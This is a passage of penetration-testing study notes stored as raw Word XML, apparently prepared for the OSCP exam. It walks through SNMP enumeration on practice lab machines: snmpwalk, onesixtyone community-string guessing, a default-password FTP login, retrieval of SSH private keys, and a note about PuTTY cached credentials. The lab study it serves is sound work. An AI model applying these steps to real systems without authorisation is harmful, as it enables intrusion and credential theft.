      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_30lo8vcuieqx" w:id="437"/>
      <w:bookmarkEnd w:id="437"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example from OSCP-A regarding installed applications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In OSCP-A .145, we first used snmp walk to look at installed applications and found wifi mouse 1.7.8.5 which is vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="208"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -c public -v1 192.168.236.145 1.3.6.1.2.1.25.6.3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="208"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you should see</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iso.3.6.1.2.1.25.6.3.1.2.12 = STRING: "Mouse Server version 1.7.8.5"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000312F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And for priv esc, we had to use snmpwalk again. This time, we used the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">same command</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and found PuTTY, which caused us to look at PuTTY cached credentials in registry, which gave us credentials!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003130">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003131">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_erb1uyaauzc" w:id="438"/>
      <w:bookmarkEnd w:id="438"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example from OSCP-B regarding looking at interesting non-default MIB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003132">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003133">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from OSCP-B .151</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003134">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003135">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First, thanks to AutoRecon, we saw that SNMP UDP was open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003136">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Tried looking at the website but it was default Ubuntu site with no directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003137">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And so the only things left were SNMP and FTP. FTP has no anonymous login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003138">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, due to AutoRecon running onesixtyone, I saw only </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">public community string was op</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">en</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003139">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64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onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt -dd 192.168.216.149 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313A">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So, I started to enumerate SNMP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64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905000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="570" name="image553.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image553.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109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313C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>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snmpwalk -v 1 -c public 192.168.220.149 NET-SNMP-EXTEND-MIB::nsExtendObjects</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This finds the custom scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To understand the output, you need these two lines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000313F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64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NET-SNMP-EXTEND-MIB::nsExtendCommand."RESET" = STRING: /home/john/RESET_PASSWD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003140">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="64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NET-SNMP-EXTENDOutLine."RESET" = STRING: Resetting password of kiero to the default value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003141">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This basically means whenever we run /home/john/RESET_PASSWD we reset password of kiero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003142">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So, we now know that kiero has a default password. So I just searched up "kiero default password" in case kiero is some type of application, and it turns it is! And the default password is "kiero"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003143">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So, I tried kiero:kiero for FTP and it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003144">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64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ftp kiero@192.168.220.149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003145">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kiero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003146">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ALSO, look at the hostname guys! It's legit kiero. Once we saw kiero, we should know it had to do something with this. Always use the hostname as a hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003147">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And inside were 2 private SSH keys, and one public SSH key!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003148">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64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1219200" cy="571500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="278" name="image274.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image274.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1095"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1219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3149">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I then tried both private keys against kiero, but they didn't work.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314A">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I then tried them against john (the other username seen in the SNMP output), and I got this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64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397500" cy="2184400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="148" name="image166.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image166.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1096"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="53975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314C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This meant that the permissions of the id_rsa file were not fit for a private key!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314D">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I had forgotten to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> chmod 600</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the private keys! I should always do that!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So I tried again</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000314F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64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chmod 600 id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003150">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="64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ssh -i id_rsa john@192.168.220.149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="647"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it worked!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003152">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003153">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003154">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003155">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_oyz6ao8k878i" w:id="439"/>
      <w:bookmarkEnd w:id="439"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example (HTB)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003156">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003157">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003158">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want more in-depth SNMP usage, look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Antique HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003159">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315A">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SNMP (Simple Network Management Protocol)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is like a communication tool used in networks to monitor and manage devices such as routers, switches, printers, and servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here's how it works in simple terms:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What It Does</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SNMP helps network administrators check the health of devices, track performance, and even change settings remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="458"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How It Works</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000315E">
